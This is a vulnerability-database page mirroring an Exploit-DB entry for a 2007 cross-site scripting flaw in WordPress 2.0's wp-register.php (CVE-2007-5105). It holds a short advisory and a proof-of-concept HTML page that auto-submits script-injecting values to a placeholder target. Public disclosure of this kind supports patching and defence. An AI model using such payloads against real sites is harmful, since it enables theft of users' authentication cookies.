Lucene search
+L

WordPress Core 2.0 - 'wp-register.php' Multiple Cross-Site Scripting Vulnerabilities

🗓️ 22 Sep 2007 00:00:00Reported by Adrian PastorType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

WordPress Core 2.0 'wp-register.php' Cross-Site Scripting Vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-5105
26 Sep 200722:00
cve
cvelist
Cvelist
CVE-2007-5105
26 Sep 200722:00
cvelist
debiancve
Debian CVE
CVE-2007-5105
26 Sep 200722:00
debiancve
euvd
EUVD
EUVD-2007-5086
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-5105
26 Sep 200722:17
nvd
osv
OSV
DEBIAN-CVE-2007-5105
26 Sep 200722:17
osv
patchstack
Patchstack
WordPress <= 2.0.1 - XSS
26 Sep 200700:00
patchstack
prion
Prion
Cross site scripting
26 Sep 200722:17
prion
ubuntucve
UbuntuCve
CVE-2007-5105
26 Sep 200722:17
ubuntucve
wpvulndb
WPVulnDB
Wordpress 1.5.1 - 2.0.2 wp-register.php Multiple Parameter XSS
1 Aug 201410:58
wpvulndb
Rows per page
source: https://www.securityfocus.com/bid/25769/info

WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This issue affects WordPress 2.0; other versions may also be affected.

<html>
<head></head>
<body>

<form method="post" action="http://target/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='"><script>alert(1)</script>' />
<input type="hidden" name="user_email" id="user_email"
value='"><script>alert(2)</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 May 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.04381
26